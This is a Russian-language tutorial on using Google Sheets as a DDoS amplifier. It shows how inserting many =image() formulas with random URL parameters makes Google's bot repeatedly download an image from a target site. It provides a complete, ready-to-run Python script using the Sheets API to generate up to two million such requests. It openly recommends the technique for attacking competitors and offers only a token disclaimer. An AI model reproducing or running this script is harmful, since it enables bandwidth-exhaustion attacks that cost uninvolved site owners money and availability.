April 30, 2020

DDOS с помощью Google

Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред, причиненный материалами данной статьи.

В чем суть

Данная атака состоит в особом использовании формулы для вставки изображения в ячейку =image("http://www.example.org/image.jpg"). Если вставить данную формулу в Google Sheets, бот google перейдёт по ссылке и скачает файл чтобы затем вставить в таблицу. Одного перехода бота на атакуемый сайт нам недостаточно, поэтому нам надо как можно больше вставить таких формул в таблицу, но бот не дурак и знает что такая картинка уже есть и он нам отдаст ее из кэша, а не пойдет повторно на атакуемый сайт. Однако если добавить к ссылке случайный параметр, то робот скачает этот файл ещё раз =image("http://www.example.org/image.jpg?r=1"). Таким образом мы можем заставить бота обращаться к серверу столько раз, сколько нам вздумается.

Положить крупный сайт таким образом вероятно не удастся но замедлить и сожрать трафик возможно (данный тип атаки хорошо подойдет для конкурентной борьбы). Вот статья The Google attack: How I attacked myself using Google Spreadsheets and I ramped up a $1000 bandwidth bill в которой говориться о том как владелец сайта попал на 1000 долларов из за Google Spreadsheets.

Google знает об этом и ничего с этим не собирается делать так как это не является ошибкой.

От теории к делу

Начнем со сбора данных которые нам будут нужны в процессе написания программы. Нам понадобится spreadsheets id, названия листа а также URL на изображение с атакуемого сайта. Если у вас нет google аккаунта создаем, затем идем в spreadsheets и создаем новый файл, переходим на него. Из URL берем spreadsheets id.

Теперь нам надо переименовать название листа (имя не имеет значения главное чтобы была на английском). Я дам имя list1 вы же можете назвать как угодно. Листы находятся внизу таблицы, в новом документе он будет один, нажимаем на треугольник возле название как показано на скриншоте.

В появившимся меню выбираем переименовать, задаем имя и нажимаем enter.

Думаю как получить URL на картинку с атакуемого сайта объяснять не нужно (если есть возможность, выбирайте картинку с максимальным размером).

По итогу у нас должно получиться три параметра:

Код:

USER_ENTERED: 1jWBT1_DZMUqpga1rhpzqmzmwM7EzVtvcUyeQmUDEgcI
LIST_NAME: list1
URL: http://www.example.org/image.jpg

Теперь можно приступить непосредственно к написанию самой программы. В качестве языка программирования возьмем Python, а для взаимодействия с таблицей воспользуемся Sheets API. Для начала установим библиотеки для работы с API.

Код:

pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib

Затем нам надо получить json файл с client id и client secret. Для этого идем по этой ссылки на документацию Python Quickstart | Sheets API | Google Developers находим там первый шаг и нажимаем на синюю кнопку.

Откроется модальное окно, нажимаем опять на синею кнопку и качаем credentials.json, кладем его рядом с нашим будущим скриптом в один каталог. Этот файл нам понадобиться что бы работать с API

Теперь приступаем к написанию кода. Для работы с таблицей нам надо авторизоваться. Для этого воспользуемся документацией Python Quickstart | Sheets API | Google Developers и перейдем на шаг 3 на основе примера накидаем следующий код.

Python:

from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request

# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/contacts.readonly']


def authorization():
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server()
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)

return build('sheets', 'v4', credentials=creds)


if __name__ == '__main__':
authorization()

В переменной SCOPES храниться права доступа, с которыми мы проходим авторизацию. Те, что в примере нам не подходят так как они дают права на чтение, а нам надо на редактирование. Идем в документацию, находим нужный раздел Authorize Requests | Sheets API | Google Developers видим список прав. Нам надо https://www.googleapis.com/auth/spreadsheets. Заменяем SCOPES = ['https://www.googleapis.com/auth/contacts.readonly'] на SCOPES = ['https://www.googleapis.com/auth/spreadsheets']. Теперь у нас есть права на запись после авторизации. Осталось написать функцию генерации ссылок. Опять идем в документацию находим как добавлять новые записи в таблицу Method: spreadsheets.values.update | Sheets API | Google Developers. На основе примера пишем функцию добавления.

Python:

def add_img(limit, service):
values = []
data = []
body = {
'values': values
}

for request in range(limit):
for number in range(20):
data.append('=image("{0}?r={1}")'.format(URL, uuid.uuid4()))

time.sleep(0.5)

values.append(data)

result = service.spreadsheets().values().update(
spreadsheetId=SPREADSHEET_ID, range=SAMPLE_RANGE_NAME,
valueInputOption=VALUE_INPUT_OPTION, body=body
).execute()

data = []

print('{0} cells updated.'.format(result.get('updatedCells')))

В функции используем первый цикл для генерации общего количества заполнения строк, а второй для генерации столбцов. Этот метод uuid.uuid4() генерирует уникальный параметр для каждой ссылки, чтобы бот не кэшировал картинки. В переменной VALUE_INPUT_OPTION содержится параметр USER_ENTERED который позволяет вставлять в ячейку формулу. Объединив все в один код мы получим готовую программу.

from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import uuid
import time

# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']

SPREADSHEET_ID = ''
LIST_NAME = ''
URL = ''
SAMPLE_RANGE_NAME = LIST_NAME + '!A1'
VALUE_INPUT_OPTION = 'USER_ENTERED'
LIMIT = 100000


def authorization():
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server()
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)

return build('sheets', 'v4', credentials=creds)


def add_img(limit, service):
values = []
data = []
body = {
'values': values
}

for request in range(limit):
for number in range(20):
data.append('=image("{0}?r={1}")'.format(URL, uuid.uuid4()))

time.sleep(0.5)

values.append(data)

result = service.spreadsheets().values().update(
spreadsheetId=SPREADSHEET_ID, range=SAMPLE_RANGE_NAME,
valueInputOption=VALUE_INPUT_OPTION, body=body
).execute()

data = []

print('{0} cells updated.'.format(result.get('updatedCells')))


def main():
service = authorization()
add_img(LIMIT, service)


if __name__ == '__main__':
main()

Осталось подставить недостающие параметры, которые мы получили ранее в соответствующие переменные и можно тестировать наш скрипт) Атака работает следующим образом: запускаете скрипт, он начинает генерировать функции с подгрузкой картинок не дожидаясь выполнения скрипта, нужно открыть таблицу в браузере чтобы бот начал подгружать картинки. Как только картинки начинают подгружаться значит запросы на атакуемый сервер полетели.